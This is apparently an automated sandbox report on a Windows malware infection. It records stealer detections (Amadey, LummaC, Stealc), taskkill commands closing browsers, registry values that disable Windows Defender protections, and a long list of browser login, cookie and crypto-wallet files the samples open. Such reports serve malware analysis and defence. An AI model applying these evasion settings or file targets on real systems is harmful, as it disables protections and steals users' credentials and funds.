Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: 36321ea525.exe, 0000000B.00000002.2637223017.0000000000DF2000.00000002.00000001.01000000.0000000C.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: skotes.exe, skotes.exe, 00000002.00000002.1821553428.0000000001147000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: *Program Manager
Source: d015c0e328.exe, d015c0e328.exe, 00000007.00000002.2928166711.0000000006599000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: 9b8665be8a.exe, 9b8665be8a.exe, 00000008.00000002.2534980003.0000000000C0F000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: mProgram Manager
Source: firefox.exe, 00000019.00000002.2791332255.0000001E7E5FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: d015c0e328.exe, d015c0e328.exe, 00000007.00000002.2902629480.0000000000900000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: DProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008485001\36321ea525.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008484001\9b8665be8a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Registry value created: TamperProtection 0
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1008486001\da69a13142.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
AV process strings found (often used to terminate AV products)
Source: d015c0e328.exe, 00000007.00000003.2799971962.0000000001111000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2572023293.00000000011AD000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 00000007.00000003.2693329851.000000000113E000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2710867732.0000000001653000.00000004.00000020.00020000.00000000.sdmp, d015c0e328.exe, 0000000A.00000003.2836656383.000000000164D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 1.2.skotes.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.skotes.exe.f40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.1779970897.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1816150110.0000000000F41000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2282068353.0000000005030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1786321241.0000000000A11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1821078306.0000000000F41000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1775730528.00000000056E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1746120844.0000000005200000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: 36321ea525.exe PID: 7296, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 7632, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 5236, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d015c0e328.exe PID: 4428, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 00000008.00000003.2491430724.00000000051F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2537402557.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.2696170160.0000000004E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2795135342.0000000000FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2788626873.0000000000831000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2532205314.0000000000831000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 9b8665be8a.exe PID: 7888, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: d015c0e328.exe String found in binary or memory: Wallets/Electrum
Source: d015c0e328.exe String found in binary or memory: Wallets/ElectronCash
Source: d015c0e328.exe String found in binary or memory: window-state.json
Source: d015c0e328.exe, 00000007.00000003.2539906220.0000000001190000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: d015c0e328.exe, 00000016.00000003.2681910564.0000000000548000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \\Exodus\\exodus{
Source: d015c0e328.exe, 00000007.00000003.2510001376.0000000005A07000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3X
Source: d015c0e328.exe String found in binary or memory: Wallets/Ethereum
Source: d015c0e328.exe, 0000000A.00000003.2682307378.000000000163B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: d015c0e328.exe, 00000007.00000003.2540070221.0000000001196000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: d015c0e328.exe, 00000016.00000003.2748385585.000000000054D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1008483001\d015c0e328.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
